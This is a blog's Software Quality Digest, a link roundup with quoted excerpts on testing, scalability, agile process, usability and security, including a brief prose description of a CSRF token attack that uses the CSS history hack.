No bug left behind

The Software Quality Digest with the latest articles, blog postings and discussions about software quality, testing, usability, accessibility, scalability and related topics of the past two weeks. If you have a relevant link for the Software Quality Digest, please let us know and we would be happy to include it in the next digest.

Software Quality and Testing

• Software Engineering: Dead? – “And yet, it’s also a release. It’s as if a crushing weight has been lifted from my chest. I can publicly acknowledge what I’ve slowly, gradually realized over the last 5 to 10 years of my career as a software developer: what we do is craftsmanship, not engineering. And I can say this proudly, unashamedly, with nary a shred of self-doubt.”
• The four essential laws of software updates – “Automatic updates are becoming more and more common, which is a good thing. They save us time and hassle: instead of finagling with installers, we can just sit back, relax, and let all our programs do the work for us. Oh, if only it were that easy.”
• Good Lazy and Bad Lazy – “Something which I’ve come to realise more recently is that it’s not necessarily true that being lazy as a developer is always a good thing – it depends in what way you are being lazy because there are certainly good and bad ways in which you can express your laziness!”
• Book Review: The Art of Unit Testing – “Given my personal commitment to software quality through testing, I was excited to get my hands on a copy of Roy Osherove’s The Art of Unit Testing from Manning. A few weeks ago our copy was delivered and I have been excited for an upcoming vacation which would give me the time to sit down and churn through the book.”

Performance and Scalability

• My Thoughts on NoSQL – “In the late nineties and early thousands, websites were mostly read-only–a publisher would create some content and users would consume that content. [..] And with that fundamental shift away from read-heavy architectures to read/write and write-heavy architectures, a lot of the way that we think about storing and retrieving data needed to change.”
• Latency is Everywhere and it Costs You Sales – How to Crush it – “Latency matters. Amazon found every 100ms of latency cost them 1% in sales. Google found an extra .5 seconds in search page generation time dropped traffic by 20%. A broker could lose $4 million in revenues per millisecond if their electronic trading platform is 5 milliseconds behind the competition. “
• Scalability issues for dummies – “Every once in a while I get people asking me what’s taking me so long to open my startup Inkzee to the public. They also ask me what exactly have I been doing as the web seems exactly the same. I normally answer that things aren’t easy, that it takes time, specially if you are alone, like I am. After a while I end up explaining my problems with scalability and that’s the point where people just can’t follow you. I’m going to explain here what are scalability problems and how deep the repercussions are for a small company.”

Process and Methodology

• Considering Agile, deciding against it – “Some time ago, while managing a distributed software project, I spoke to a developer who was thinking about joining our team. This individual was a big proponent of Agile development. When he found out that in our particular project we were not using an Agile development model, he began to lose interest. He compared my position there to the position of the Tom Smykowski character from the movie Office Space.”
• Planning for Feature-Complete Deadlines – “Planning to catch a plane is a perfect example of risk management for contained change: problems are expected, but they usually fall within a range you can still make an estimate of. (I wrote about this in my post The Three Types of Change.) Using experience I can make a probabilistic forecast of the time required to catch the plane. It will take two hours at the least to be there on time. But when Murphy’s Law hits me (and it usually does in some way) it could be anywhere up to four hours.”

Usability and Accessibility

• Mobile Usability – “When designing for mobile, there’s a tension between (a) making content and navigation salient so that people do not work too hard to get there, and (b) designing for a small screen and for slow downloading speeds. That’s why almost every design decision must be made in the context of the site being designed, and what works for a site may not work for another. “
• The Inclusion Principle – “Affordance allows us to look at something and intuitively understand how to interact with it. For example, when we see a small button next to a door, we know we should push it with a finger. Convention tells us it will make a sound, notifying the homeowner that someone is at the door. This concept transfers to the virtual environment: when we see a 3D-shaped button on a web page, we understand that we are supposed to “push” it with a mouse-click.”
• Reinventing the desktop (for real this time) – Part 1 – “Since the 1980’s, this functionality has been presented to users on most systems with only minor variations upon the standard WIMP (Window, Icons, Menu, Pointer) model handed down from Xerox PARC and the first Mac, so, obviously, the modern desktop is not really broken: people have been getting by with essentially the same design for decades now. Still, there is a perennial longing for something better, so the question is what motivates this feeling?”

Security

• Hacking CSRF Tokens using CSS History Hack – “In this exploit, we discover the csrf token by brute forcing the various set of urls in browser history. We will try to embed different csrf token values as part of url and check if the user has visited that url. If yes, there is a good chance that the user is either using the same CSRF token in the current active session or might have used that token in a previous session. Once we have a list of all such tokens, we can just try our csrf attack on the server using that small list.”

Related posts:

1. Software Quality Digest – 2009-03-13
2. Software Quality Digest – 2009-04-06

Found this article useful? Make sure to subscribe to the No bug left behind feed or via email and don't miss our future articles about software quality, performance, usability and related topics. This blog also features the regular Software Quality Digest with links to relevant articles, discussions and other resources.